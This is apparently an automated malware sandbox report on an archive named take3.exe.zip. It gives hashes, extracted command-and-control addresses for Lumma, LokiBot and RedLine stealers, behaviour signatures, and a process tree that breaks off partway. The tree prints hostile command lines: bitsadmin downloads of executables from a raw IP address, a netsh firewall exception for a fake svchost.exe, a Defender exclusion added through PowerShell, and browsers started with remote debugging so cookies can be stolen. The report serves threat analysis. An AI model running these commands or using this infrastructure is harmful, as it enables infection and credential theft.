Analysis

  • max time kernel
    217s
  • max time network
    219s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-11-2024 19:42

Errors

Reason
Machine shutdown

General

  • Target

    take3.exe.zip

  • Size

    14.1MB

  • MD5

    fb86164c16c7debfbcfeddba64451f64

  • SHA1

    c91ec76ab3d4231d9c057b3e856ffbfc53d408d3

  • SHA256

    5f16ff577993765462d5b054e943ed28bf5dbddb869ca48b22e5643c1a32e6c9

  • SHA512

    b6b4111cb9d9bd45deb8bf047ef098824682addadd3d1ae59f29f13a0a74675c293271dc4f982ac3663300ee68900faf7ec2eb93e9d5a95ae3e59b59b30ab119

  • SSDEEP

    393216:0vWy1UJDCqPY5SiNXKWgQjXqp3dBW7Hnu2RBD:0OGeDJPY5nXKWg48qDD

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/unvd01/unvmain/raw/main/un2/botprnt.dat

exe.dropper

http://unvdwl.com/un2/botprnt.dat

Extracted

Family

lumma

C2

https://preside-comforter.sbs

https://savvy-steereo.sbs

https://copper-replace.sbs

https://record-envyp.sbs

https://slam-whipp.sbs

https://wrench-creter.sbs

https://looky-marked.sbs

https://plastic-mitten.sbs

https://tail-cease.cyou

Extracted

Family

lokibot

C2

http://94.156.177.41/maxzi/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

redline

Botnet

Diamotrix

C2

176.111.174.140:1912

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Njrat family
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Powershell Invoke Web Request.

  • Creates new service(s) 2 TTPs
  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Uses browser remote debugging 2 TTPs 12 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 33 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 48 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 24 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 12 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 42 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SendNotifyMessage
    • Suspicious use of SetWindowsHookEx
    PID:3316
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\take3.exe.zip"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:5348
    • C:\Users\Admin\Desktop\take3.exe
      "C:\Users\Admin\Desktop\take3.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4880
      • C:\Users\Admin\Desktop\take3.exe
        "C:\Users\Admin\Desktop\take3.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:5004
        • C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe
          "C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5000
          • C:\Windows\SysWOW64\ping.exe
            ping -n 1 8.8.8.8
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2512
          • C:\Windows\SysWOW64\bitsadmin.exe
            bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
            5⤵
            • Download via BitsAdmin
            • System Location Discovery: System Language Discovery
            PID:5048
          • C:\Windows\SysWOW64\bitsadmin.exe
            bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"
            5⤵
            • Download via BitsAdmin
            • System Location Discovery: System Language Discovery
            PID:2800
        • C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
          "C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2108
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            5⤵
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3916
            • C:\Windows\SysWOW64\netsh.exe
              netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE
              6⤵
              • Modifies Windows Firewall
              • Event Triggered Execution: Netsh Helper DLL
              • System Location Discovery: System Language Discovery
              PID:3108
        • C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe
          "C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1636
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            5⤵
            • Uses browser remote debugging
            • Drops file in Windows directory
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:5532
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff982f0cc40,0x7ff982f0cc4c,0x7ff982f0cc58
              6⤵
                PID:724
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1748,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1724 /prefetch:2
                6⤵
                  PID:5452
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1920,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2124 /prefetch:3
                  6⤵
                    PID:3416
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2164,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2228 /prefetch:8
                    6⤵
                      PID:780
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3132,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:4104
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3160,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:4836
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4412,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4492 /prefetch:1
                      6⤵
                      • Uses browser remote debugging
                      PID:6100
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4856,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:8
                      6⤵
                        PID:2260
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4900,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4916 /prefetch:8
                        6⤵
                          PID:2800
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4892 /prefetch:8
                          6⤵
                            PID:1840
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5048,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5144 /prefetch:8
                            6⤵
                              PID:2512
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5052,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4924 /prefetch:8
                              6⤵
                                PID:1564
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4888,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8
                                6⤵
                                  PID:3720
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4876,i,16996255277064951943,7571593070286659497,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5256 /prefetch:2
                                  6⤵
                                  • Uses browser remote debugging
                                  PID:2944
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                5⤵
                                • Uses browser remote debugging
                                • Enumerates system info in registry
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                • Suspicious use of FindShellTrayWindow
                                PID:1844
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff982cc3cb8,0x7ff982cc3cc8,0x7ff982cc3cd8
                                  6⤵
                                    PID:2260
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1872 /prefetch:2
                                    6⤵
                                      PID:2436
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2336 /prefetch:3
                                      6⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2828
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2616 /prefetch:8
                                      6⤵
                                        PID:3432
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:1
                                        6⤵
                                        • Uses browser remote debugging
                                        PID:1952
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
                                        6⤵
                                        • Uses browser remote debugging
                                        PID:1880
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1864 /prefetch:2
                                        6⤵
                                          PID:1088
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2284 /prefetch:2
                                          6⤵
                                            PID:2924
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2272 /prefetch:2
                                            6⤵
                                              PID:5896
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1872 /prefetch:2
                                              6⤵
                                                PID:2324
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2376 /prefetch:2
                                                6⤵
                                                  PID:3416
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
                                                  6⤵
                                                  • Uses browser remote debugging
                                                  PID:5736
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
                                                  6⤵
                                                  • Uses browser remote debugging
                                                  PID:5600
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:1
                                                  6⤵
                                                  • Uses browser remote debugging
                                                  PID:3068
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1860,12151249924034655939,4563640614984601921,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4580 /prefetch:1
                                                  6⤵
                                                  • Uses browser remote debugging
                                                  PID:2552
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CGCFBFBGHDGD" & exit
                                                5⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3760
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 10
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Delays execution with timeout.exe
                                                  PID:3416
                                            • C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe
                                              "C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"
                                              4⤵
                                              • Executes dropped EXE
                                              PID:3584
                                              • C:\Windows\SYSTEM32\cmd.exe
                                                cmd
                                                5⤵
                                                  PID:6008
                                              • C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
                                                "C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of WriteProcessMemory
                                                PID:4208
                                                • C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe
                                                  "C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4252
                                              • C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe
                                                "C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
                                                4⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5624
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
                                                  5⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:6076
                                                • C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe
                                                  "C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:1676
                                                • C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe
